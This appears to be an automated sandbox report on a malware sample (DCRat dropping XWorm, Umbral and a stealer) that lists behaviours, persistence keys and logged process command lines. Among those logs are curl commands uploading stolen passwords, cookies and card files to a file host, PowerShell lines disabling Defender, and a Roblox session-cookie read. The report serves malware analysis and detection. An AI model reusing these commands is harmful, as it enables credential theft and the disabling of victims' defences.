Analysis Overview
SHA256
d958d55003daa3b5e322a920126104fbd93663b46803c8653aa0240aa1e80244
Threat Level: Known bad
The file DCRat.exe was found to be: Known bad.
Malicious Activity Summary
Xworm
Detect Umbral payload
Detect Xworm Payload
DcRat
Umbral family
Umbral
DCRat payload
Dcrat family
DCRat payload
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Loads dropped DLL
Reads user/profile data of web browsers
Executes dropped EXE
Drops startup file
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Unsigned PE
Enumerates physical storage devices
Detects Pyinstaller
Views/modifies file attributes
Enumerates processes with tasklist
Runs ping.exe
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Detects videocard installed
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-22 15:54
Signatures
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Dcrat family
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Umbral family
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-22 15:54
Reported
2024-06-22 15:57
Platform
win10v2004-20240508-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
DcRat
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Umbral
Xworm
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\DCRat.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\XWorm.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | C:\Users\Admin\AppData\Local\Temp\creal.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk | C:\Users\Admin\AppData\Local\Temp\XWorm.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk | C:\Users\Admin\AppData\Local\Temp\XWorm.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SHEETRAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\creal.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Umbral.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\creal.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Local\\Temp\\update.exe" | C:\Users\Admin\AppData\Local\Temp\XWorm.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Umbral.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\DCRat.exe
"C:\Users\Admin\AppData\Local\Temp\DCRat.exe"
C:\Users\Admin\AppData\Local\Temp\SHEETRAT.exe
"C:\Users\Admin\AppData\Local\Temp\SHEETRAT.exe"
C:\Users\Admin\AppData\Local\Temp\XWorm.exe
"C:\Users\Admin\AppData\Local\Temp\XWorm.exe"
C:\Users\Admin\AppData\Local\Temp\creal.exe
"C:\Users\Admin\AppData\Local\Temp\creal.exe"
C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
C:\Users\Admin\AppData\Local\Temp\creal.exe
"C:\Users\Admin\AppData\Local\Temp\creal.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XWorm.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\update.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'update.exe'
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"
C:\Windows\SysWOW64\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"
C:\Windows\SysWOW64\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"
C:\Windows\SysWOW64\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"
C:\Windows\SysWOW64\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"
C:\Windows\SysWOW64\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"
C:\Windows\SysWOW64\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | geolocation-db.com | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 52.111.229.43:443 | | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\SHEETRAT.exe
C:\Users\Admin\AppData\Local\Temp\XWorm.exe
C:\Users\Admin\AppData\Local\Temp\creal.exe
C:\Users\Admin\AppData\Local\Temp\Umbral.exe
C:\Users\Admin\AppData\Local\Temp\_MEI2082\python38.dll
C:\Users\Admin\AppData\Local\Temp\_MEI2082\VCRUNTIME140.dll
C:\Users\Admin\AppData\Local\Temp\_MEI2082\_ctypes.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI2082\python3.dll
C:\Users\Admin\AppData\Local\Temp\_MEI2082\libffi-7.dll
C:\Users\Admin\AppData\Local\Temp\_MEI2082\base_library.zip
C:\Users\Admin\AppData\Local\Temp\_MEI2082\_bz2.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI2082\_cffi_backend.cp38-win32.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI2082\_queue.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI2082\_overlapped.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI2082\_multiprocessing.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI2082\_hashlib.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI2082\_ssl.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI2082\_sqlite3.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI2082\_socket.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI2082\_decimal.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI2082\_asyncio.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI2082\unicodedata.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI2082\sqlite3.dll
C:\Users\Admin\AppData\Local\Temp\_MEI2082\select.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI2082\pyexpat.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI2082\libssl-1_1.dll
C:\Users\Admin\AppData\Local\Temp\_MEI2082\libcrypto-1_1.dll
C:\Users\Admin\AppData\Local\Temp\_MEI2082\_lzma.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI2082\charset_normalizer\md__mypyc.cp38-win32.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI2082\charset_normalizer\md.cp38-win32.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI2082\Crypto\Cipher\_raw_cbc.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI2082\Crypto\Cipher\_raw_ecb.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI2082\Crypto\Cipher\_raw_cfb.pyd
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ddzrfyuw.5e0.ps1
C:\Users\Admin\AppData\Local\Tempcrmihcetxl.db
C:\Users\Admin\AppData\Local\Tempcrduzmflyj.db
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-22 15:54
Reported
2024-06-22 15:57
Platform
win7-20240419-en
Max time kernel
119s
Max time network
143s
Command Line
Signatures
DcRat
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Umbral
Xworm
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Umbral.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | C:\Users\Admin\AppData\Local\Temp\creal.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk | C:\Users\Admin\AppData\Local\Temp\XWorm.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk | C:\Users\Admin\AppData\Local\Temp\XWorm.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SHEETRAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\creal.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Umbral.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\creal.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Local\\Temp\\update.exe" | C:\Users\Admin\AppData\Local\Temp\XWorm.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\XWorm.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Umbral.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\DCRat.exe
"C:\Users\Admin\AppData\Local\Temp\DCRat.exe"
C:\Users\Admin\AppData\Local\Temp\SHEETRAT.exe
"C:\Users\Admin\AppData\Local\Temp\SHEETRAT.exe"
C:\Users\Admin\AppData\Local\Temp\XWorm.exe
"C:\Users\Admin\AppData\Local\Temp\XWorm.exe"
C:\Users\Admin\AppData\Local\Temp\creal.exe
"C:\Users\Admin\AppData\Local\Temp\creal.exe"
C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
C:\Users\Admin\AppData\Local\Temp\creal.exe
"C:\Users\Admin\AppData\Local\Temp\creal.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\system32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XWorm.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\update.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'update.exe'
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\system32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
Network
Files
\Users\Admin\AppData\Local\Temp\SHEETRAT.exe
C:\Users\Admin\AppData\Local\Temp\XWorm.exe
\Users\Admin\AppData\Local\Temp\creal.exe
\Users\Admin\AppData\Local\Temp\Umbral.exe
C:\Users\Admin\AppData\Local\Temp\_MEI30682\python38.dll
C:\Users\Admin\AppData\Local\Temp\_MEI30682\VCRUNTIME140.dll
C:\Users\Admin\AppData\Local\Temp\_MEI30682\base_library.zip
C:\Users\Admin\AppData\Local\Temp\_MEI30682\python3.dll
C:\Users\Admin\AppData\Local\Temp\_MEI30682\libffi-7.dll
\Users\Admin\AppData\Local\Temp\_MEI30682\_ctypes.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI30682\_bz2.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI30682\select.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI30682\_ssl.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI30682\_sqlite3.pyd
\Users\Admin\AppData\Local\Temp\_MEI30682\_socket.pyd
\Users\Admin\AppData\Local\Temp\_MEI30682\_queue.pyd
\Users\Admin\AppData\Local\Temp\_MEI30682\_hashlib.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI30682\_overlapped.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI30682\_multiprocessing.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI30682\_decimal.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI30682\_cffi_backend.cp38-win32.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI30682\_asyncio.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI30682\unicodedata.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI30682\sqlite3.dll
C:\Users\Admin\AppData\Local\Temp\_MEI30682\pyexpat.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI30682\libssl-1_1.dll
C:\Users\Admin\AppData\Local\Temp\_MEI30682\libcrypto-1_1.dll
\Users\Admin\AppData\Local\Temp\_MEI30682\_lzma.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI30682\charset_normalizer\md.cp38-win32.pyd
\Users\Admin\AppData\Local\Temp\_MEI30682\charset_normalizer\md__mypyc.cp38-win32.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI30682\Crypto\Cipher\_raw_ecb.pyd
C:\Users\Admin\AppData\Local\Tempcrynqighmc.db
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TIQYGXN02A5V0ORJRK0I.temp
C:\Users\Admin\AppData\Local\Temp\b5ANag0P9SCKnrY
C:\Users\Admin\AppData\Local\Temp\ymLnofAR8LypnBk